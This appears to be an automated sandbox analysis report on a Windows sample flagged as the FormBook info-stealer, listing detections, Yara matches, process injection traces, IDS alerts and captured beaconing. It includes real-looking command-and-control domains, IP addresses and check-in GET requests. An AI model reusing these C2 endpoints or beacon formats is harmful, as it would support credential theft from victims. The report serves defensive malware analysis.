"0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for submitted file

Show sources

Source: HOPEFUL.exe

ReversingLabs: Detection: 31%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: HOPEFUL.exe

Joe Sandbox ML: detected

Source: 5.2.AddInProcess32.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: HOPEFUL.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: HOPEFUL.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, cmmon32.exe
Source:	Binary string: AddInProcess32.pdbpw source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 4x nop then jmp 0164F5EEh	0_2_0164EE1A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 4x nop then pop edi	5_2_00416BF3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 4x nop then pop edi	5_2_00416C07
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 4x nop then pop edi	5_2_00416C27
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 4x nop then pop edi	5_2_00416C3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 4x nop then pop edi	5_2_00417D68
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi	19_2_00ED6BF3
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi	19_2_00ED6C27
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi	19_2_00ED6C3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi	19_2_00ED6C07
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 4x nop then pop edi	19_2_00ED7D68

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80

Source: global traffic	HTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1Host: www.the343radio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1Host: www.registeredagentfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1Host: www.tiendazoom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 34.98.99.30 34.98.99.30

Source: Joe Sandbox View	ASN Name: IHNETUS IHNETUS
Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic	HTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1Host: www.the343radio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1Host: www.registeredagentfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1Host: www.tiendazoom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.the343radio.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:50:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: explorer.exe, 0000000D.00000000.325706052.000000000F640000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.11sxsx.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.11sxsx.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.11sxsx.com/jqc/www.lhc965.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.11sxsx.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bebywye.site
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bebywye.site/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bebywye.site/jqc/www.ip-freight.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bebywye.siteReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.eaglesnestpropheticministry.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.eaglesnestpropheticministry.com/jqc/www.internetmarkaching.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.eaglesnestpropheticministry.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.internetmarkaching.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.internetmarkaching.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.internetmarkaching.com/jqc/www.weddingmustgoon.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.internetmarkaching.comReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip-freight.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip-freight.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip-freight.com/jqc/www.toweroflifeinc.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip-freight.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.kenniscourtureconsignments.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.kenniscourtureconsignments.com/jqc/www.novergi.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.kenniscourtureconsignments.comReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.lhc965.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.lhc965.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.lhc965.com/jqc/www.topheadlinetowitness-today.info
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.lhc965.comReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.novergi.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.novergi.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.novergi.com/jqc/M
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.novergi.comReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.registeredagentfirm.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.registeredagentfirm.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.registeredagentfirm.com/jqc/www.tiendazoom.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.registeredagentfirm.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.strahlenschutz.digital
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.strahlenschutz.digital/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.strahlenschutz.digital/jqc/www.theorangepearl.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.strahlenschutz.digitalReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.the343radio.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.the343radio.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.the343radio.com/jqc/www.registeredagentfirm.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.the343radio.comReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.theorangepearl.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.theorangepearl.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.theorangepearl.com/jqc/www.11sxsx.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.theorangepearl.comReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiendazoom.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiendazoom.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiendazoom.com/jqc/www.eaglesnestpropheticministry.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiendazoom.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.topheadlinetowitness-today.info
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.topheadlinetowitness-today.info/jqc/www.kenniscourtureconsignments.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.topheadlinetowitness-today.infoReferer:
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.toweroflifeinc.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.toweroflifeinc.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.toweroflifeinc.com/jqc/www.strahlenschutz.digital
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.toweroflifeinc.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.weddingmustgoon.com
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.weddingmustgoon.com/jqc/
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.weddingmustgoon.com/jqc/www.bebywye.site
Source: explorer.exe, 0000000D.00000002.573959275.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.weddingmustgoon.comReferer:
Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419D60 NtCreateFile,	5_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E10 NtReadFile,	5_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E90 NtClose,	5_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419F40 NtAllocateVirtualMemory,	5_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419D5D NtCreateFile,	5_2_00419D5D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E0B NtReadFile,	5_2_00419E0B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E8A NtClose,	5_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419F3A NtAllocateVirtualMemory,	5_2_00419F3A
